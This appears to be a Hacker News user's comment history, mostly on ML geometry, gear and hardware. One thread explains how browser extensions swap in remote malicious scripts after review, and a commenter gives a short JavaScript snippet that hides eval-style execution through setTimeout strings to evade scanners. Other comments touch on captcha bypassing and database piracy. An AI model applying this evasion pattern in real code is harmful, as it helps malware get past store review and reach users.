More

rckoepke · on April 4, 2023

Chrome has a browser extension API which allows plugins to access all cookies, but its use is considered suspicious and a red flag; an extension which uses it would generally get caught during initial review. However, Chrome extensions are also allowed to “hotload” portions of their own code/scripts from external 3rd party servers.

So an extension will seem benign when it initially gets checked by Google as part of becoming part of its submission to the Chrome Store. Then, later, the external “3rd party” script that is hosted remotely will get replaced with a different, malicious script. The malicious extension carries on stealing cookies, credentials, and fingerprints until someone reverse engineers it and reports it to Google.

Google will not always recognize the issue immediately because the 3rd-party malicious code is not strictly “part of” the extension so there’s a bit of a song and dance while the person who reversed it convinces Googles reviewers that “yes, this really is actually malicious, you need to analyze the third party code that loads later” and then Google eventually takes it down after a semi-involved back-and-forth where extensive documentation and video walk-throughs are provided by the exasperated white-hat Good Samaritan.

TedDoesntTalk · on April 5, 2023

Remote loading of code has been banned by Google and Mozilla for several years now. The automated review tools pick up script injection and eval() calls. Unless you can craft something unique, you’re not going to get past the automated review.

I’m guessing the malware is something else besides a browser extension.

asddubs · on April 5, 2023

stuff like setTimeout accepts strings too. I wonder how good those scanners are at detecting overwriting an initial innocent function that's later called in a timeout with a string, it can get fairly indirect

    let harmless = { func : function() { }, harmlessExternallyLoadedString : '' };
    let toAccess = 'func';
    //do stuff that seems legit
    if(true) {
        let toAccess = 'harmlessExternallyLoadedString';
    }
    harmless[toAccess] = 'alert(1);'; //imagine this being a fetch request
    //later on
    setTimeout(harmless.func, 1);

now imagine the logic for what othervar is set to is obfuscated a bit by a more complex logic tree, and the example was a bit less contrived.

LelouBil · on April 4, 2023

Seems like you speak from experience.

Do you have any specifics to share ?

rckoepke · on Feb 9, 2023

I've been trying to use convex hulls to explore ML embedding spaces. However, the dimensionality (768+ dimensions) seems to crash established options like QHull[0], even with 64GB RAM (and 16 CPU cores, albeit libqhull is not multi-threaded).

Are there more appropriate algorithms for finding convex hulls where dimensions are ~768? Or any parallelized / GPU-optimized options that I should look into?

0: http://www.qhull.org

blamestross · on Feb 9, 2023

> Qhull does not support triangulation of non-convex surfaces, mesh generation of non-convex objects, medium-sized inputs in 9-D and higher, alpha shapes, weighted Voronoi diagrams, Voronoi volumes, or constrained Delaunay triangulations,

You are going to have to roll your own.

One trick you can use is that most convex hull algorithms chase O(nlg(n)). That lg(n) implies a branching step which lowers efficiency on GPUs. Your coefficients in high dimensions likely mean an O(n^2) branchless algorithm could run faster on a GPU.

Cull points aggressively too, for what little that is worth in high dimensions.

I found https://www.sciencedirect.com/science/article/abs/pii/S01678... which looks like it could be a starting point.

The real problem is that in dimensions that high, the point set probably already is the hull and all this is a zero signal gain operation.

rckoepke · on Feb 9, 2023

> The real problem is that in dimensions that high, the point set probably already is the hull and all this is a zero signal gain operation.

Well, if I have 10,000 samples of a 768-dimension volume, most of those points will probably be inside the volume, and not per se a vertex of the hull.

I’m very comfortable rolling my own solution, so thank you for pointing me to Jarvis’ algorithm!

blamestross · on Feb 12, 2023

So, about that. Do the math on how many faces a 768-simplex has.

rckoepke · on Feb 13, 2023

Revisiting this. Isn't it a bit of a red herring to enquire about the number of 2-faces that an n-simplex has? It still only has n+1 vertices. A 768-simplex may have 75.5 million faces but it will still only have 769 vertices which completely define the shape. So why would I expect a large number of the other >90% of the 10,000 samples I have to lie on the surface, rather than inside the interior volume?

To be more direct, what's the specific relevance of bringing up the number of 2-faces that an n-simplex has?

blamestross · on Feb 13, 2023

So you won't be able to define a hull at all without (n+1) points. He has 10k points so that sounds like a lot relatively.

So the definition of a convex hull is, put generally, the set of points that define faces such that every point is on the face or on the "inside" of it (mean point side)

To test if a point is inside that simplex hull, you need to check every one of those faces. But that isn't the problem.

Every face is a "filter" that all the other points have to pass. Moving beyond the simplex, at higher dimensions, the number of faces that need to "accept" every other point scales faster in higher dimensions. The odds of that aren't horribly clear, you are right in other comments to call out that the structure of points in this context is by definition not independent or random, but you need enough structure to get around the fact that high dimensional hulls are basically all surface.

rckoepke · on Feb 12, 2023

I believe the answer is:

(n+1)!/((k+1)!*(n-k)!) where n=768 and k=2

Or about 75.5 million triangular faces. Which explains a lot. Thanks for that.

rcme · on Feb 9, 2023

Depends on how complicated the branches are. One solution to branching on GPUs is to compute every branch, which is only a constant-time increase in computation. I find it hard to believe there are many cases where n^2 would be faster than lg(n) for large n.

apwheele · on Feb 9, 2023

Due to the curse of dimensionality, more of the points are pushed toward the hull in higher dimensions. So I don't think this is likely to be very effective as a data exploration technique as stated.

There may be more general expected value formulas for higher dimensions, I only know of examples in two-dimensions offhand, https://blogs.sas.com/content/iml/2021/12/06/expected-number....

There may be smarter reduced form embeddings though to make pretty pictures, e.g. https://www.youtube.com/watch?v=sD-uDZ8zXkc&ab_channel=Cynth....

rcme · on Feb 9, 2023

I wonder if the curse of dimensionality would necessarily apply. In general, yes, most of the points in a n-dimensional volume lie near the surface in high dimensional spaces. While true, this seems mostly to be an issue when sampling random, independent points from the space. For an ML problem, all of the points are likely dependent on a few underlying processes.

Wikipedia has more on this: https://en.wikipedia.org/wiki/Curse_of_dimensionality

> This is often cited as distance functions losing their usefulness (for the nearest-neighbor criterion in feature-comparison algorithms, for example) in high dimensions. However, recent research has shown this to only hold in the artificial scenario when the one-dimensional distributions R \mathbb {R} are independent and identically distributed.[13] When attributes are correlated, data can become easier and provide higher distance contrast and the signal-to-noise ratio was found to play an important role, thus feature selection should be used.

> More recently, it has been suggested that there may be a conceptual flaw in the argument that contrast-loss creates a curse in high dimensions. Machine learning can be understood as the problem of assigning instances to their respective generative process of origin, with class labels acting as symbolic representations of individual generative processes. The curse's derivation assumes all instances are independent, identical outcomes of a single high dimensional generative process. If there is only one generative process, there would exist only one (naturally occurring) class and machine learning would be conceptually ill-defined in both high and low dimensions. Thus, the traditional argument that contrast-loss creates a curse, may be fundamentally inappropriate. In addition, it has been shown that when the generative model is modified to accommodate multiple generative processes, contrast-loss can morph from a curse to a blessing, as it ensures that the nearest-neighbor of an instance is almost-surely its most closely related instance. From this perspective, contrast-loss makes high dimensional distances especially meaningful and not especially non-meaningful as is often argued.

rckoepke · on Sept 1, 2022

Check out TIZIP SuperSeal zipper -- it was used on some "dry suits" I wear for offshore sailboat racing in cold-water environments and is truly water-proof. It's advertised to be water-proof up to 700 millibar of pressure differential, which is equivalent to 23 feet of water depth. This zipper does require maintenance in the form of regular lubrication using, for example, a food-grade silicone grease/lubricant like the ones used for slushie/daiquiri machines.

I've looked into getting it worked into bags from Montrose Rope and Sail in Scotland when I worked in offshore industrial environments, but they don't have the equipment to do the "vinyl welding" necessary so you'd have to buy the bag without zippers and then find someone else who could do that welding.

rckoepke · on Aug 30, 2022

> Spending 8k-ish to build a product demo for my friends rich uncle is too uphill for me to risk.

That’s something I could potentially fund. No equity, just pro-bono / repay if it works out. Feel free to reach out and chat if it’s a dream you believe in.

But $250k from this might go a lot further.

alecfreudenberg · on Aug 30, 2022

I could definitely get off the ground for much less, but having rent/bills covered to go all-in, and capital for speed-to-market / competitive advantage is real nice. As long as I have a legally maximized control of the charter considering the investment, I'm happy to give up future cash. To me, realized gains is a byproduct of viably bringing the product to the world. But doing the thing is the purpose.

And it would free up my time to focus on scaling and experimenting instead of assembling.

I'm genuinely taken back by that offer, and I'll be reaching out to your email with an introduction. Thank you for reaching out.

rckoepke · on June 3, 2022

Could you pirate the database, then hide behind the fifth amendment to not reveal that you're a pirate while simultaneously asserting that you never agreed to any EULA? I'm not sure what the legal rights are here.

I'm certain someone in say, China or Russia, could pirate the database and run benchmarks on it with no repercussions. Surprising that this isn't a business model for an overseas technology analyst firm.

xen0 · on June 3, 2022

> Surprising that this isn't a business model for an overseas technology analyst firm.

How much are you willing to pay for a legally dubious benchmark?

aaaaaaaaata · on June 4, 2022

Does anyone ever pay for benchmarks?

Or are they web content used to lure in new contracts?

mindslight · on June 4, 2022

It's much simpler than that.

Person A installs database on a shared or to-be-sold computer, requires a license for the installation process to make a copy, "agrees" to EULA.

Person B then runs benchmarks on said computer, which does not require a license because no copy is being made, and publishes the results.

The only flaw in this is that Oracle will send its mafia enforcers to break your kneecaps despite not having a valid legal case. So you'll lose even if you technically can win.

eastbound · on June 4, 2022

The Fifth only protects the innocents. It’s a fun twist of this amendment - if you are guilty you do not have a right to keep silent.

jkaplowitz · on June 4, 2022

That's true if you've been convicted and sentenced for the crime regarding which your testimony would self-incriminate, but not otherwise. Someone who has committed the crime but hasn't yet been convicted and sentenced still falls under its protection, assuming there isn't a grant of immunity from prosecution to force the testimony anyway.

HideousKojima · on June 4, 2022

Other way around, sadly:

https://en.m.wikipedia.org/wiki/Haynes_v._United_States

Convicted felons are exempt from the portion of the National Firearms Act that requires that machine guns (and other NFA items like short barreled shotguns) be registered as it would violate their 5th Amendment rights.

donatj · on June 6, 2022

Huh, that is one of the most interesting supreme court decisions I think I've read. I kind of agree with it in a text-of-the-law sense.

I would be very curious to see that logic hold up in court these days. They got Al Capone on tax evasion for instance, but wouldn't paying his taxes on ill-got funds have been incriminating?

Xelbair · on June 4, 2022

and in any sane legal system you are innocent until proven guilty.

rckoepke · on April 18, 2022

For web scraping specifically, I’ve developed key parts of commercial systems to automatically bypass reCAPTCHA, Arkose Labs (Fun Captcha), etc.

If someone dedicated themselves to it, there’s a lot more that these solutions could be doing to distinguish between humans and bots, but it requires true specialized talent and larger expenses.

Also, for a handful of the companies which make the most popular captcha solutions, I don’t think the incentives align properly to fully segregate human and bot traffic at this time.

I think we’re still very much still picking at the very lowest hanging fruit, both for anti-bot countermeasures and anti-anti-bot (counter-countermeasures).

Personally I believe this will finally accelerate once AI’s can play computer games via a camera, keyboard, and mouse. And when successors GPT-3 / PaLM can participate well in niche discussion forums like HackerNews or the Discord server for Rust.

Until then it’s mainly a cost filter or confidence modification. As long as enough bots are blocked so that the ones which remain are technically competent enough to not stress the servers, most companies don’t care. And as long as the businesses deploying reCAPTCHA are reasonably confident that most of the views they get are humans (even if that belief is false), Google doesn’t have a strong incentive to improve the system.

Reddit doesn’t seem to care much either. As long as the bots which participate are “good enough”, it drives engagement metrics and increases revenue.

rckoepke · on March 21, 2022

Your service helped me immensely when I was getting started with machine learning, but had no budget and just a laptop. For me, everything “just worked”, and I learned a ton about Docker and created my own system to handle the ephemeral nature of the computing systems by automatically backing up training checkpoints, programmatically finding the next best “deal”/“bid” and resuming the training on a different instance.

Was very very cool, and I generally recommend it to anyone I come across who has modest needs (<25 GPUs).

I did find the throughout was not always accurate at the time. This was about 2 years ago. It was fairly frequent that a listing would say “300” to “1000” Mbps Up+Down, but would actually get an order of magnitude less to any of the big cloud services (GCP, AWS, etc). It wasn’t important to me that the speed was low, but it was important that it didn’t match what was “advertised”. For certain workloads I would have gladly paid more for higher throughput but that’s not really an option when the listings couldn’t be fully trusted.

I also heard there may be some opportunities to market your technology/platform for “on-prem”, “on-demand” GPU clouds for large enterprises so that a pool of corporate GPUs could be efficiently used and accurately billed to a variety of internal stakeholders. Could improve asset utilization for capital intensive on premise GPU’s.

rckoepke · on Jan 18, 2022

Amazon sidewalk, actually. Should prove cheaper and work near any sense housing.

rckoepke · on Jan 18, 2022

Indeed. The old MacAddict magazine shipped a CD with every issue. The CD contained loads of shareware/games/utilities/productivity software etc.

The CD also had a folder named "updates and patches" where you could find installers for the latest bug fixes of the most popular MacOS software.

CDs bundled with monthly magazines was a valid conduit for getting patches to users at the time.

RajT88 · on Jan 19, 2022

Some 360 games shipped with console updates as well. Required to be applied before you could play the game.

rckoepke · on Jan 17, 2022

Correct.

To be pedantic, there is a built-in 16kB ROM starting at address 0x00000000 with RPi's open-source BootROM burned into it at the time the silicon is manufactured. There's no publicly-known way to write to this. It's technically "non-volatile storage", but it's not useful to anyone other than RaspberryPi/TSMC.

lonjil · on Jan 17, 2022

There's no privately known way of writing to it either. Mask ROMs are set in stone.